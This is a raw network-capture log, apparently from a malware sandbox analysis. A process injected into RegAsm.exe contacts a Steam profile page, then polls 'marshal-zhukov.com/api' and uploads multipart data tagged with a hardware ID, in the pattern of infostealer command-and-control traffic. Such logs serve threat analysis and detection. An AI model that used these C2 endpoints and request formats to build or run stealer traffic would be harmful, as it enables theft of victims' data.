2024-11-14 07:08:23 UTC	3768	IN	Data Raw: 70 6c 61 79 65 72 41 76 61 74 61 72 20 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 69 7a 65 20 6f 66 66 6c 69 6e 65 22 20 64 61 74 61 2d 6d 69 6e 69 70 72 6f 66 69 6c 65 3d 22 31 37 36 34 30 36 36 31 37 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 79 65 72 41 76 61 74 61 72 41 75 74 6f 53 69 7a 65 49 6e 6e 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d Data Ascii: playerAvatar profile_header_size offline" data-miniprofile="1764066172"><div class="playerAvatarAutoSizeInner"><img src="https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div>
2024-11-14 07:08:23 UTC	1345	IN	Data Raw: 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 73 6b 69 6e 5f 31 2f 66 6f 6f 74 65 72 4c 6f 67 6f 5f 76 61 6c 76 65 2e 70 6e 67 3f 76 3d 31 22 20 77 69 64 74 68 3d 22 39 36 22 20 68 65 69 67 68 74 3d 22 32 36 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 56 61 6c 76 65 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 54 65 78 74 22 3e 0d 0a 09 09 09 09 09 26 63 6f 70 79 3b 20 56 61 6c 76 65 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70 65 72 74 79 20 6f 66 20 74 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e Data Ascii: teamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span><span id="footerText">© Valve Corporation. All rights reserved. All trademarks are property of their respective own

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:24 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: marshal-zhukov.com
2024-11-14 07:08:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-14 07:08:25 UTC	1009	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ejq6s9dfa5v6c8mhch8pvk87ir; expires=Mon, 10-Mar-2025 00:55:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMnxcRwL2LB6auwrDPWixRjPb3A7DYUoWXeMDEoJyvoSWQ9OIg9m9QkzNs1kbFCrJkhiGZB8oURiKM0s%2FnuPo1WBxlwIswJ9hgsRvu4KNP85qPC3sBybsJhk08eqlZ1x1cmYFNY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252b8f380b3462-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=2271372&cwnd=248&unsent_bytes=0&cid=3ab758244beee8cf&ts=513&x=0"
2024-11-14 07:08:25 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-14 07:08:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49708	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:26 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: marshal-zhukov.com
2024-11-14 07:08:26 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6928154717&j=
2024-11-14 07:08:26 UTC	1017	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=830uji9q4etdkkh0kheqd67plb; expires=Mon, 10-Mar-2025 00:55:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5W6%2BKcaw2z3YIBpVJ4P2gM5RyoSwBcMH4SLfIrRGQaArvVu0aCDxyEPNp7OF7TiU0L8%2BLdlrYLKtV4uIri4mJ%2BFCaXsEZ72NisIN3z1lkxrrItFTQVRvd1%2Bg3qnKYSx06r%2BKtk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252b980ced2e7e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1369&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=954&delivery_rate=2080459&cwnd=249&unsent_bytes=0&cid=52416479a33a677e&ts=517&x=0"
2024-11-14 07:08:26 UTC	352	IN	Data Raw: 34 64 36 0d 0a 77 30 38 75 34 65 45 79 6c 4e 77 34 35 58 37 59 37 45 6f 6c 47 4d 31 68 6d 59 6c 6c 37 34 47 31 2f 4c 62 70 68 72 31 4b 48 67 69 34 62 56 6a 44 32 77 61 34 2f 6b 75 41 58 4f 4b 59 4f 46 42 39 34 55 50 34 37 55 66 56 35 39 53 51 78 59 79 71 6e 7a 78 7a 4b 76 6b 70 54 34 32 53 56 37 6a 2b 58 5a 31 63 34 72 63 78 42 33 32 6a 51 36 4f 72 41 49 58 6a 31 4a 44 55 69 4f 33 53 4f 6e 4a 72 71 79 4e 4a 69 59 52 52 38 4c 31 55 69 42 75 39 69 53 74 50 64 71 51 4d 38 65 52 48 77 36 50 51 68 70 54 54 70 50 41 76 61 6d 6d 4f 4c 6c 32 4b 77 30 2b 34 70 78 71 41 45 50 72 57 61 45 52 39 72 77 33 2f 37 51 36 48 36 64 32 59 31 59 33 73 7a 53 4e 34 59 4b 73 74 53 6f 69 4f 57 4f 53 77 58 6f 38 51 75 34 4d 72 42 7a 54 76 42 4f 4f 72 58 38 32 77 35 5a 33 46 6d 76 Data Ascii: 4d6w08u4eEylNw45X7Y7EolGM1hmYll74G1/Lbphr1KHgi4bVjD2wa4/kuAXOKYOFB94UP47UfV59SQxYyqnzxzKvkpT42SV7j+XZ1c4rcxB32jQ6OrAIXj1JDUiO3SOnJrqyNJiYRR8L1UiBu9iStPdqQM8eRHw6PQhpTTpPAvammOLl2Kw0+4pxqAEPrWaER9rw3/7Q6H6d2Y1Y3szSN4YKstSoiOWOSwXo8Qu4MrBzTvBOOrX82w5Z3Fmv
2024-11-14 07:08:26 UTC	893	IN	Data Raw: 43 58 66 61 73 55 6f 77 58 76 35 77 6a 54 6e 65 69 41 2f 62 68 43 49 37 6a 30 4a 54 65 68 4f 37 62 4a 58 46 73 6f 53 30 4d 7a 63 4e 58 37 76 34 43 78 7a 2b 2f 6e 69 39 4c 62 4f 30 35 75 2f 52 4a 6c 4b 50 51 6b 70 54 54 70 4e 63 74 66 32 6d 71 49 6b 2b 4c 69 45 4c 32 72 46 79 4b 47 61 69 49 4c 55 6c 77 72 42 48 78 35 51 47 4f 36 74 79 58 30 59 7a 67 6e 32 59 38 62 62 6c 74 46 4d 4f 69 58 66 32 79 55 4a 41 63 2b 70 46 6d 58 6a 71 6f 44 37 75 7a 52 34 6e 69 30 35 2f 51 68 65 72 62 4a 48 70 6b 72 43 4a 4b 69 59 4e 58 2f 4c 5a 53 68 68 47 78 67 53 68 43 64 36 73 46 39 2b 6f 43 7a 61 32 58 6d 63 7a 4c 76 4a 38 47 65 32 6d 7a 62 33 6d 41 6a 56 37 78 71 42 71 59 55 71 50 4f 4c 30 73 36 39 30 50 31 37 67 69 66 34 73 57 62 32 70 6e 6f 32 69 35 78 61 61 38 74 53 59 Data Ascii: CXfasUowXv5wjTneiA/bhCI7j0JTehO7bJXFsoS0MzcNX7v4Cxz+/ni9LbO05u/RJlKPQkpTTpNctf2mqIk+LiEL2rFyKGaiILUlwrBHx5QGO6tyX0Yzgn2Y8bbltFMOiXf2yUJAc+pFmXjqoD7uzR4ni05/QherbJHpkrCJKiYNX/LZShhGxgShCd6sF9+oCza2XmczLvJ8Ge2mzb3mAjV7xqBqYUqPOL0s690P17gif4sWb2pno2i5xaa8tSY
2024-11-14 07:08:26 UTC	1369	IN	Data Raw: 33 66 39 36 0d 0a 77 6e 54 34 65 48 58 66 6d 33 55 34 34 4f 73 49 49 6d 56 58 65 6c 42 76 58 6e 41 6f 4c 6a 31 70 2f 61 67 65 2b 66 5a 6a 78 74 75 57 30 55 77 36 78 64 35 71 78 51 6a 41 33 34 75 79 74 4a 64 4b 67 56 75 2f 52 4a 6c 4b 50 51 6b 70 54 54 70 4e 51 75 63 47 61 68 4b 31 36 4e 6a 45 4c 38 72 46 36 4a 47 4c 61 41 49 55 70 31 71 68 48 2f 36 78 57 4d 35 74 43 51 32 5a 6e 68 6e 32 59 38 62 62 6c 74 46 4d 4f 35 5a 50 47 75 53 34 42 65 6a 34 30 6d 53 58 32 35 51 2b 53 6c 48 73 33 6b 32 39 36 4d 79 2b 66 54 4a 58 56 76 72 6a 39 47 6a 34 4a 43 38 62 64 54 6a 52 32 30 67 53 4e 4c 66 37 30 49 39 4f 4d 49 6a 4f 37 61 6c 64 43 4c 70 4a 46 6f 65 33 4c 68 64 51 79 69 6a 6c 2f 6b 76 55 76 46 4b 62 6d 41 4a 6b 42 73 37 78 79 31 38 6b 65 4b 37 35 66 47 6c 49 72 Data Ascii: 3f96wnT4eHXfm3U44OsIImVXelBvXnAoLj1p/age+fZjxtuW0Uw6xd5qxQjA34uytJdKgVu/RJlKPQkpTTpNQucGahK16NjEL8rF6JGLaAIUp1qhH/6xWM5tCQ2Znhn2Y8bbltFMO5ZPGuS4Bej40mSX25Q+SlHs3k296My+fTJXVvrj9Gj4JC8bdTjR20gSNLf70I9OMIjO7aldCLpJFoe3LhdQyijl/kvUvFKbmAJkBs7xy18keK75fGlIr
2024-11-14 07:08:26 UTC	1369	IN	Data Raw: 47 53 74 4a 6b 75 49 69 46 54 79 76 6c 65 4d 45 72 53 48 4a 45 39 32 71 42 48 32 37 67 2b 48 36 74 4b 53 32 59 6a 32 33 43 6b 38 4a 4f 45 71 56 4d 50 62 45 4e 47 4e 62 61 52 63 70 63 41 78 42 33 32 6a 51 36 4f 72 42 6f 58 6b 32 5a 72 47 68 66 62 52 4c 33 78 73 71 53 56 4c 6a 34 31 65 35 4c 5a 62 68 78 4b 31 68 69 46 44 65 36 73 48 39 2b 78 48 77 36 50 51 68 70 54 54 70 50 63 72 5a 6e 44 6a 41 30 65 44 68 45 44 67 70 52 71 59 55 71 50 4f 4c 30 73 36 39 30 50 2f 34 41 32 45 34 4e 36 61 32 59 76 74 30 43 46 30 5a 36 6b 2f 54 59 6d 52 56 50 4f 2f 56 59 30 59 73 6f 49 6e 53 33 36 39 43 4c 75 6c 52 34 72 37 6c 38 61 55 71 2b 2f 4a 43 32 35 34 34 54 49 43 6d 73 4e 58 2b 76 34 43 78 78 57 32 6a 79 6c 4e 66 4b 51 47 39 75 73 43 68 2b 54 62 6e 74 53 49 34 74 6b 6c Data Ascii: GStJkuIiFTyvleMErSHJE92qBH27g+H6tKS2Yj23Ck8JOEqVMPbENGNbaRcpcAxB32jQ6OrBoXk2ZrGhfbRL3xsqSVLj41e5LZbhxK1hiFDe6sH9+xHw6PQhpTTpPcrZnDjA0eDhEDgpRqYUqPOL0s690P/4A2E4N6a2Yvt0CF0Z6k/TYmRVPO/VY0YsoInS369CLulR4r7l8aUq+/JC2544TICmsNX+v4CxxW2jylNfKQG9usCh+TbntSI4tkl
2024-11-14 07:08:26 UTC	1369	IN	Data Raw: 52 45 67 34 78 56 2f 72 56 63 69 52 32 38 67 69 55 48 4e 4f 38 45 34 36 74 66 7a 63 54 4e 6b 39 4b 63 39 65 6f 76 66 44 76 68 4d 67 4b 61 77 31 66 36 2f 67 4c 48 45 62 61 45 4a 55 4a 2b 70 77 54 34 36 67 75 4a 37 74 71 61 33 59 2f 68 7a 54 70 36 5a 4b 45 69 51 6f 79 50 51 76 69 37 57 6f 74 63 39 4d 34 76 58 7a 72 33 51 38 72 38 42 38 33 38 6d 59 65 55 6a 4f 69 66 63 44 78 6c 72 44 39 41 6a 49 4e 52 39 62 70 52 67 42 71 38 6a 79 74 43 65 61 6f 46 2b 75 73 4c 68 2b 54 66 6c 4e 71 47 34 74 73 75 65 69 72 76 62 55 75 62 77 77 69 32 6a 46 65 4a 46 62 6d 49 4a 56 46 53 6e 6b 50 6b 70 52 37 4e 35 4e 76 65 6a 4d 76 67 31 43 42 77 62 36 6b 6f 54 59 75 4a 57 50 6d 78 53 49 59 54 73 34 6b 6a 53 6e 57 68 42 76 58 35 41 49 62 6f 33 35 66 61 6a 61 53 52 61 48 74 79 34 Data Ascii: REg4xV/rVciR28giUHNO8E46tfzcTNk9Kc9eovfDvhMgKaw1f6/gLHEbaEJUJ+pwT46guJ7tqa3Y/hzTp6ZKEiQoyPQvi7Wotc9M4vXzr3Q8r8B838mYeUjOifcDxlrD9AjINR9bpRgBq8jytCeaoF+usLh+TflNqG4tsueirvbUubwwi2jFeJFbmIJVFSnkPkpR7N5NvejMvg1CBwb6koTYuJWPmxSIYTs4kjSnWhBvX5AIbo35fajaSRaHty4
2024-11-14 07:08:26 UTC	1369	IN	Data Raw: 44 57 2f 36 35 55 6f 4d 53 71 49 38 6e 42 7a 54 76 42 4f 4f 72 58 38 33 53 77 5a 6e 54 68 4b 62 32 4c 32 64 72 71 79 35 48 6a 38 4e 50 75 4b 63 61 67 42 44 36 31 6d 68 4b 64 71 49 48 36 65 63 48 6a 65 72 51 6c 4d 61 45 36 39 49 72 66 47 2b 7a 4c 46 36 4d 69 46 58 31 75 6c 57 49 45 4c 4b 45 61 41 6b 36 71 42 75 37 73 30 65 68 34 4d 61 55 6c 71 7a 2b 79 53 39 77 65 36 6f 67 51 4d 4f 63 48 75 2f 2b 58 59 74 63 34 73 34 6f 52 6e 65 39 42 76 72 68 44 59 44 72 32 4a 76 52 68 4f 44 62 49 33 4a 34 72 79 4a 4d 68 59 68 52 38 37 31 52 6a 52 4b 7a 6e 47 67 4a 4f 71 67 62 75 37 4e 48 70 2f 6a 57 6b 39 6a 4a 79 74 51 2b 65 79 69 41 49 30 65 45 6a 30 61 32 6f 52 53 65 58 4c 32 43 61 42 38 36 70 67 33 33 36 41 43 46 36 39 4b 65 33 34 76 72 31 53 5a 37 65 4b 73 68 52 70 Data Ascii: DW/65UoMSqI8nBzTvBOOrX83SwZnThKb2L2drqy5Hj8NPuKcagBD61mhKdqIH6ecHjerQlMaE69IrfG+zLF6MiFX1ulWIELKEaAk6qBu7s0eh4MaUlqz+yS9we6ogQMOcHu/+XYtc4s4oRne9BvrhDYDr2JvRhODbI3J4ryJMhYhR871RjRKznGgJOqgbu7NHp/jWk9jJytQ+eyiAI0eEj0a2oRSeXL2CaB86pg336ACF69Ke34vr1SZ7eKshRp
2024-11-14 07:08:26 UTC	1369	IN	Data Raw: 72 68 71 59 55 71 50 4f 4c 30 73 36 39 30 50 37 37 77 75 4f 35 4e 6d 52 32 59 54 6a 31 43 64 32 5a 4c 4d 69 53 59 75 50 57 50 75 73 55 49 30 4f 73 34 63 6c 53 58 4b 39 41 4c 75 6c 52 34 72 37 6c 38 61 55 75 65 37 63 4a 47 70 6e 72 6d 31 54 7a 5a 6f 51 38 62 49 61 33 31 79 6f 6e 43 68 4d 65 71 67 4e 36 65 6f 50 67 75 6e 58 6d 4e 2b 42 35 39 59 73 63 6d 4f 6e 4c 45 47 43 67 6c 44 7a 76 6c 4f 56 45 66 72 41 61 45 42 69 37 31 75 37 33 41 75 47 30 74 53 49 6c 4a 53 71 78 6d 68 37 5a 75 46 31 44 49 4b 52 58 66 36 36 57 6f 6f 61 73 59 38 70 52 48 71 76 41 50 76 75 44 49 4c 6c 30 4a 50 65 67 75 33 4e 49 48 68 34 6f 53 46 49 77 38 30 51 38 61 59 61 33 31 79 4b 6a 53 4e 4c 65 71 49 57 75 2f 52 4a 6c 4b 50 51 6b 70 54 54 70 4e 63 6a 64 32 79 71 4c 6b 2b 4e 69 46 72 Data Ascii: rhqYUqPOL0s690P77wuO5NmR2YTj1Cd2ZLMiSYuPWPusUI0Os4clSXK9ALulR4r7l8aUue7cJGpnrm1TzZoQ8bIa31yonChMeqgN6eoPgunXmN+B59YscmOnLEGCglDzvlOVEfrAaEBi71u73AuG0tSIlJSqxmh7ZuF1DIKRXf66WooasY8pRHqvAPvuDILl0JPegu3NIHh4oSFIw80Q8aYa31yKjSNLeqIWu/RJlKPQkpTTpNcjd2yqLk+NiFr
2024-11-14 07:08:26 UTC	1369	IN	Data Raw: 6a 79 78 6d 43 6c 4b 63 61 4e 42 2b 75 59 58 69 71 4f 5a 33 74 4c 4c 76 49 39 6d 50 47 36 77 62 52 54 54 30 51 75 6a 37 51 33 58 54 71 58 41 4d 51 64 73 37 31 75 70 70 55 65 66 6f 34 2f 65 6b 34 6a 32 7a 53 35 2f 66 4b 4a 71 63 72 32 6a 57 2f 71 39 56 6f 59 62 2b 73 42 6f 53 44 72 33 4f 72 76 6f 46 5a 2b 73 78 6f 6a 5a 6d 2b 4f 54 49 47 31 6e 72 57 30 43 77 38 39 55 2f 62 4a 66 67 41 7a 31 6e 44 68 4d 64 72 6c 50 2f 2f 6c 48 77 36 50 47 6c 64 75 5a 36 74 68 6e 62 58 79 73 50 55 2b 47 68 42 7a 2b 72 31 65 4c 58 50 54 4f 50 55 78 32 71 51 37 75 70 42 61 62 34 4d 47 5a 6d 49 50 31 30 69 51 38 56 65 39 74 56 4d 50 62 45 4d 4f 39 56 49 6b 62 72 4a 39 6c 5a 33 47 6a 41 50 66 71 41 4d 32 74 6c 35 69 55 30 37 65 52 61 48 68 37 34 58 55 63 30 64 67 46 70 65 6b 4b Data Ascii: jyxmClKcaNB+uYXiqOZ3tLLvI9mPG6wbRTT0Quj7Q3XTqXAMQds71uppUefo4/ek4j2zS5/fKJqcr2jW/q9VoYb+sBoSDr3OrvoFZ+sxojZm+OTIG1nrW0Cw89U/bJfgAz1nDhMdrlP//lHw6PGlduZ6thnbXysPU+GhBz+r1eLXPTOPUx2qQ7upBab4MGZmIP10iQ8Ve9tVMPbEMO9VIkbrJ9lZ3GjAPfqAM2tl5iU07eRaHh74XUc0dgFpekK
2024-11-14 07:08:26 UTC	1369	IN	Data Raw: 41 78 42 32 7a 76 57 36 69 6c 52 35 2b 6a 6a 39 36 54 68 65 6e 65 4b 33 4a 70 73 7a 39 4b 67 4a 56 54 73 59 42 6b 6f 68 47 33 69 79 5a 41 52 4a 45 69 38 66 73 4b 67 75 54 70 6f 4f 4f 61 34 38 39 71 57 6d 6d 33 4c 67 7a 4e 77 30 69 32 35 68 71 6d 46 71 71 44 4a 30 41 36 34 55 50 2f 71 31 2f 4e 78 74 71 54 30 59 58 6a 6e 51 6c 32 65 71 77 69 53 38 50 4e 45 50 72 2b 41 73 63 64 73 4a 34 6c 53 48 33 6a 42 4f 48 73 52 38 4f 6a 32 64 36 4d 79 2b 58 56 4f 48 46 6c 70 6d 46 4b 6a 59 30 51 36 66 42 44 78 77 72 36 31 6e 73 4a 4f 72 31 44 6f 36 74 41 67 2b 37 57 6e 64 71 49 39 73 30 75 66 33 79 69 61 6e 4b 39 70 6c 33 37 75 31 53 41 49 6f 53 76 49 6c 64 33 6f 41 53 35 79 77 43 62 34 4f 6d 67 34 35 72 6a 7a 32 70 61 61 62 63 75 44 4d 33 44 53 4c 62 6d 47 71 59 57 71 Data Ascii: AxB2zvW6ilR5+jj96TheneK3Jpsz9KgJVTsYBkohG3iyZARJEi8fsKguTpoOOa489qWmm3LgzNw0i25hqmFqqDJ0A64UP/q1/NxtqT0YXjnQl2eqwiS8PNEPr+AscdsJ4lSH3jBOHsR8Oj2d6My+XVOHFlpmFKjY0Q6fBDxwr61nsJOr1Do6tAg+7WndqI9s0uf3yianK9pl37u1SAIoSvIld3oAS5ywCb4Omg45rjz2paabcuDM3DSLbmGqYWq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49709	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:27 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XQBYBEG863 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12792 Host: marshal-zhukov.com
2024-11-14 07:08:27 UTC	12792	OUT	Data Raw: 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e Data Ascii: --XQBYBEG863Content-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--XQBYBEG863Content-Disposition: form-data; name="pid"2--XQBYBEG863Content-Disposition: form-data; name="lid"yau6Na--6928154717--XQBYBEG863Con
2024-11-14 07:08:28 UTC	1012	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1hvob2gvs4s7k3mr3aisco0d6m; expires=Mon, 10-Mar-2025 00:55:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nb1UrWcJIgBRa8xyTPqwN3KO1qwnlgzOsH3LLN2Scs4HfYopWhwfLhqYuZ5XN65ck36dnwYCW2U6u%2BNguYlYumFAvzIsJmVHPNqsadLhn8tJgzsPCHDR9qPbV72qhxPZAW6pnpY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252ba02c548785-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13726&delivery_rate=2389438&cwnd=252&unsent_bytes=0&cid=065fb19f9ddc9e20&ts=558&x=0"
2024-11-14 07:08:28 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a Data Ascii: 11ok 173.254.250.91
2024-11-14 07:08:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49710	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:28 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=K2WH2DKYB9DNNTZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15064 Host: marshal-zhukov.com
2024-11-14 07:08:28 UTC	15064	OUT	Data Raw: 2d 2d 4b 32 57 48 32 44 4b 59 42 39 44 4e 4e 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 4b 32 57 48 32 44 4b 59 42 39 44 4e 4e 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 32 57 48 32 44 4b 59 42 39 44 4e 4e 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d Data Ascii: --K2WH2DKYB9DNNTZContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--K2WH2DKYB9DNNTZContent-Disposition: form-data; name="pid"2--K2WH2DKYB9DNNTZContent-Disposition: form-data; name="lid"yau6Na--6928154717--
2024-11-14 07:08:29 UTC	1013	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c53ddp6kpv51ne7nccku39i3u6; expires=Mon, 10-Mar-2025 00:55:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rl0LeTSUSPcJxt59kwRs1p1Blpt7m00fkInL5sg8rzkYFgkKVH78Rb6hExmD9Xc4nVt2EOhM2gAOgkU2A3cE7AlGCSNyyRTIBwiDsHJ1zxXrd9JkEXh%2FbvgOUswbygBvglx5yAs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252ba78f3c3aa6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16003&delivery_rate=2203957&cwnd=251&unsent_bytes=0&cid=f4a468bc2aa1760b&ts=561&x=0"
